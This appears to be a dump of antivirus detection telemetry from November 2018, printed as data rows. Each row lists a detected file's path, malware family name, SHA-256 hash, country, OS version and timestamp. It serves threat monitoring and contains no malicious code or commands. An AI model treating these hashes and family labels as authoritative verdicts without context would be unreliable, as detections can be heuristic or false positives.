  Row(detection=Row(filename='avscan-20181102-055045-3640b7b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3640B7B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055158-61c35763', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055158-61C35763', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052348-728e21ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052348-728E21ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051659-7e5cefad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051659-7E5CEFAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052724-f2dafe92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052724-F2DAFE92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053907-95e96d89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053907-95E96D89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054930-098dd195', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054930-098DD195', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2bcf1121', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2BCF1121', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053655-474014d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053655-474014D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052825-17c19665', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052825-17C19665', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054453-64275650', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054453-64275650', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052434-8e03c818', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052434-8E03C818', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052345-705eb396', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052345-705EB396', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060742-94590ae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060742-94590AE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052414-8219f5c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052414-8219F5C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055816-431c1677', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055816-431C1677', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052638-d7fc6506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052638-D7FC6506', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055147-5af7def8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055147-5AF7DEF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062340-cf1a21c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062340-CF1A21C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060750-9948d172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060750-9948D172', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055735-2a906f21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055735-2A906F21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051732-92261eb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051732-92261EB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053707-4e6c0de8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053707-4E6C0DE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053757-6cb48bad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053757-6CB48BAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7c62b73f871151d5e2ea635d5821ce3fb87ab1fa7dddde1ac7ca0e29dc19cfc4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051450-31c3aa6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051450-31C3AA6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051258-ef326215', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051258-EF326215', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062325-c66956b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062325-C66956B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062144-8a4fc77b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062144-8A4FC77B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:07:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:01:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054111-dfcbb6ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054111-DFCBB6AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:36:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051941-df6d7d37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051941-DF6D7D37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052637-d6f63832', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052637-D6F63832', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadtool.exe', filepath='H:\\New folder\\CABLE PROJECT M10F Paid for_with_ph_no\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='3a234e56b0f515a8ce4c3c83a5ce9f8b24a535d8ca498ed4c3021105b7225ae3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winampa.exe', filepath='C:\\Program Files\\Winamp\\winampa.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='22ba6370f761c9dd8341f7075c959892d3aaa3822856d1b18b142121c2f72ee8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='psikotes.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\REKAP KARYAWAN\\PSIKOTES\\PSIKOTES.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:00:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7095c6bd4efe1ae956baa18ed326aa7b853d655a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7095c6bd4efe1ae956baa18ed326aa7b853d655a', filesize=2176000, name='W32/Virut.Gen.#M1.#R1'), hash='0e40e4b9dadce697e5d511832ed269a2f10efbd8d60f78f4d223df89e138d483', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sandx.xls', filepath='\\\\?\\E:\\Cong viec\\Hoc vien\\Anh Sơn\\Sân\\SANdx.xls', filesize=1472000, name='X2000M/Agent.20671246.#M1.#R1'), hash='1912e16659b4dd52b8cbeef39005ef2e303680b51d5699fee7b35cf2b9b569f4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153703-02373d07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c9c397\\AVSCAN-20181101-153555-F8D24E48\\AVSCAN-20181101-153703-02373D07', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='copy of copy of spideypc.exe', filepath='\\\\?\\H:\\العاب\\اسبيدر مان\\Copy of Copy of SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='1b118927a5b652abb85d789b0dd356247c20482c2b1367bff13807d1d1482f8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files (x86)\\Steam\\SteamApps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='0ac4b0f50093a60f4d91af9def8c52e84384940b687730b5575abb9f6f143dbe', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T17:40:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154400-f312ebd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-154400-F312EBD5', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:44:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:43:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audit 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\AUDIT 2015\\AUDIT 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:03Z'), dt=datetime.date(2018, 11, 1)),
